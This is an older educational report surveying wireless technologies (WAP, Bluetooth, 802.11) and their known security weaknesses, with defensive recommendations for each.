This is a report was developed to help define the many Wireless technologies today. Some pros and cons of each technology are listed and further reference points are given. After reading this report, you will have a better understanding of how the wireless technologies differ and some of the security implementations of each. Consider this report a crash course and not a comprehensive study.
Ad-Hoc – This is peer-to-peer setup where one wireless client talks directly to another without passing through any additional access point or proxy. A common network identifier is used for peers to communicate with each other.
Single Point of Access – An Access Point is used in this type of setup to connect wireless users to a wired network. The Access Point acts like a bridge between the wireless users and the network with which they wish to connect to. The Access Point is responsible for authenticating the wireless users via password and possibly MAC address. The distance of the wireless system to the access point determines the network performance that user will experience. A system that is 5 feet from the Access Point could monopolize the bandwidth from other users not so close and a system 20 feet away could experience degraded network performance. The area surrounding the Access Point is referred to as “Basic Service Set”, or BSS.
Multiple Access Point – This setup allows multiple Access Points for multiple systems to access the network. The purpose for this is for users to be able to roam between Access Points and be connected to the Access Point that is closest to them. The Access Points “hand-off” the users info and ensures the user is getting the best network performance available.
Can not penetrate opaque objects
Uses direct or diffused technology
Directed (Requires line of sight)
Diffused (Limited to short distances such as a single room)
Operates over a multitude of different wireless technologies:
Cellular Digital Packet Data (CDPD)
Code Division Multiple Access (CDMA)
Global System (GSM)
Built in security at the transport lawyer similar to SSL
Enables a multitude of wireless devices including cell phones and PDAs to have a common way to access the internet
WAP (Wireless Application Protocol) has an issue commonly referred to as the “WAP gap.”
Wireless Device WAP Gateway Internet Server
WTLS: Wireless Transport Layer Security
Used in versions prior to WAP 2.0
Requires the WAP Gateway to decrypt WTLS transmissions and the re-encrypt as TLS/SSL
Sensitive data is exposed as it traverses the gateway
If an attacker were to compromise the gateway, they would be able to access all of the secure communications traversing the network juncture. The wireless carrier usually controls the wireless gateway. The user will not be able to gain any knowledge regarding the security in place at the gateway. This setup requires that the users implicitly trust that the gateway is secure and monitored.
WTLS is replaced by TLS in WAP 2.0. The gateway above is no longer needed to translate (decrypt from one standard and re-encrypt to another) since the Internet servers are able to interpret the TLS transmission directly. All data remains encrypted as it passes through the gateway. Since there is such a large difference in WAP technologies, the implementation of WAP 2.0 may take a long time.
Ensure the WAP Gateway never stores decrypted content on secondary media
Implement additional security at the higher layers
Secure the WAP gateway physically so that only administrators have access to the system console
Limit administrative access to the WAP gateway so that is not available to any remote site outside the firewall
Disconnect WAP application from the rest of the network
Add WAP devices to your PKI infrastructure
Can be used to almost connect any device to another device
Operates at the 2.4 GHZ ISM Frequency band
Supports a range of 30 feet
Maximum bandwidth is 1 MB/s
Devices don’t need to be “line of sight”
Supports data, voice, and content-centric applications
Uses FHSS at up to 1600 hops per second
Signal hops among 79 frequencies at 1 MHz intervals for a high degree of interference immunity
Up to seven simultaneous connections can be established and maintained
Will be embedded in future versions of Microsoft Windows and Pocket PC’s
Each Bluetooth device stores the following:
48-bit unique device address
128-bit unique unit key
Each connection has a link key associated with it
The Link key is used to generate the encryption key
The link key value is chosen during connection setup for two devices that have not previously communicated. After this is done, it is used for authentication.
The link key is not really secret, connections can be eavesdropped and deciphered
The encryption can be broken in some cases
A device’s address is unique – by tracking a particular address a person’s activities can be tracked
A 4-digit PIN code must be entered manually each time the device is used and this can be considered a hassle
To avoid the hassle of entering the 4-digit PIN code each time, the PIN code can be stored in the devices memory or hard drive creating a security vulnerability
The user chooses the PIN code, and the PIN code requires no type of complexity. Users can use ‘0000’ or ‘1234’
Because most of the problems associated with Bluetooth are inherent in the Bluetooth protocol and implementation, there are few solutions available. Best practices to date suggest:
Implement the necessary authentication
Implement the necessary encryption mechanisms at the application layer
Avoid the use of Unit keys, use combination keys instead
The Bluetooth specification defines 3 security modes:
Non-secure - Non-secure mode does not initiate any kind of security.
Service-level security - In Service-level security, security policies are defined by the access requirements of the application the user is using.
Link level Security – Security standards are established before the link setup is complete.
Perform the bonding in an environment that is as secure as possible against eavesdroppers, and use long random Bluetooth passkeys.
For specific implementations and security concerning those implementations, please see the white-paper on Bluetooth security at: http://www.bluetooth.com/upload/24Security_Paper.PDF
802.11 supports 3 physical layers
FHSS-Frequency Hopping Spread Spectrum
DSSS-Direct Sequence Spread Spectrum
Technology spread into 802.11a, 802.11b, 802.11g
802.11b supports up to 11 Mbps at 2.4 GHz
802.11a supports up to 54 Mbps at 5 Ghz
802.11g supports up to 54 Mbps at 2.4 Ghz
802.11b only uses DSS which allows greater throughput but is more susceptible to radio signal interference
802.11a are up to 5x faster than 802.11b nets, but are not interoperable with 802.11b nets.
Media Access Control (MAC) filtering
Perform Service Set Identifier (SSID)
Encrypts data with 40 or 128 bit keys
Automated tools exist to crack WEP encryption keys
Exploits weakness in RC4 key scheduling algorithm
AirSnort tool can compute the key in less than 1 minute of sniffing wireless communication
Completely passive attack making it extremely difficult to detect
Tools used to perform attack are freely available for download on the internet
Media Access Control (MAC) address filtering – can be sniffed and spoofed.
Service Set Identifier (SSID) – broadcast by access points and should not be considered secret.
The SSID can be easily sniffed
WEP Encryption can be easily cracked
40 or 128 bit Wired Equivalent Privacy – has been broken using tools like:
Use a strong Authentication Mechanism
Require mutual authentication between client and server
Utilize end-to-end encryption at the higher protocol layers (e.g. SSH and SSL) – Using a VPN solution to replace WEP
Configure the Access Points to keep silent about the SSID – Disable the Access Points beacon signal and configure it to ignore anonymous request for the SSID.
802.11c – support for 802.11 frames
802.11d – support for 802.11 frames, new regulations
802.11e – QoS enhancements in the MAC
802.11f – Inter Access Point Protocol
802.11g – High Rate or Turbo Mode – 2.4GHz bandwidth extension to 22Mbps
802.11h – Dynamic Channel Selection and Transmit Power Control
802.11i – Security Enhancement in the MAC
802.11j – 5 GHz Globalization among IEEE, ETSI Hiperlan2, ARIB, HiSWANa
Most information below was gathered from SANS, Information Security Magazine and other top information security resources.
i. Attackers can gain access to wireless transmissions without being close to the network.
ii. Difficult to detect if someone is eavesdropping
iii. An attacker can gather critical or confidential material
b. Protecting from Eavesdropping
i. Use encryption like SSH, SSL, IPSec or VPN
ii. Prevent the Access Point from broadcasting the SSID
iii. Use authentication and access control (SSID and MAC address filtering) to prevent attackers from being able to connect to your network
i. Wireless devices can be stolen or lost
ii. Devices can contain confidential corporate information
iii. An Attacker can gain access to the network via a stolen device and information on that device
iv. Data on wireless devices is stored in clear text
b. Minimizing the Risk
i. Audit wireless devices in your environment regularly
ii. Develop strict guidelines and policies for connecting wireless devices to the network
1. Personal Use Restrictions Policy
2. Enforce a Password Policy
3. Antivirus Policy
iii. Encrypt the data that is stored on the wireless devices
iv. Strong authentication
v. Device Access Controls and Secure Configuration
i. An attacker can jam all communications on the wireless side
ii. Cost to perform a DOS is minimal
iii. Attack is simple to perform and can be done from common tools easily found on the Internet
b. Protecting against a DOS
i. In small environments use Infrared instead of RF if possible
ii. Operate wireless networks only from shielded buildings
iii. A DOS attack is very difficult to defend against. When under such an attack, locate and disable the attacking device.
a. Wireless Viruses already exist
i. Timofonica is a cell phone virus that can replicate by sending messages to randomly dialed phone numbers stored in the victim’s phonebook.
ii. Phage is a virus that destroys all data and applications on devices running the Palm OS.
b. Protecting Wireless devices from Malware
i. Install an anti-virus product that is designed specifically for Wireless devices from Mcafee, Trend Micro, F-Secure, Symantec and etc.
i. Rogue clients pretend to be a legitimate endpoint
1. An attacker could obtain a working IP address via DHCP or by guessing
2. A Rogue client becomes a node on the internal net behind all firewalls
ii. Rogue Access Points could trick clients into logging in
1. Attackers would need to place the rogue Access Points strategically to present the strongest signal
2. This would allow an attacker to harvest critical or confidential information or authentication credentials
iii. Difficult to detect this attack
b. Protecting against masquerading
i. Clients must be authenticated before being allowed to connect
ii. Use Strong authentication mechanisms that an attacker could not spoof like Public Key authentication
iii. Choose authentication mechanisms that will not reveal credentials or critical or confidential information (passwords) to a rogue Access Point
Has been around longer, more mature
Still emerging technology
Requires more handheld-sized devices or phone power than they can supply
300 plus feet range
Uses IP connection
6-54 Mbps throughput
Less than 2 Mbps throughput
(Figure 3: http://www.kerton.com/papers/BT-WF.pdf)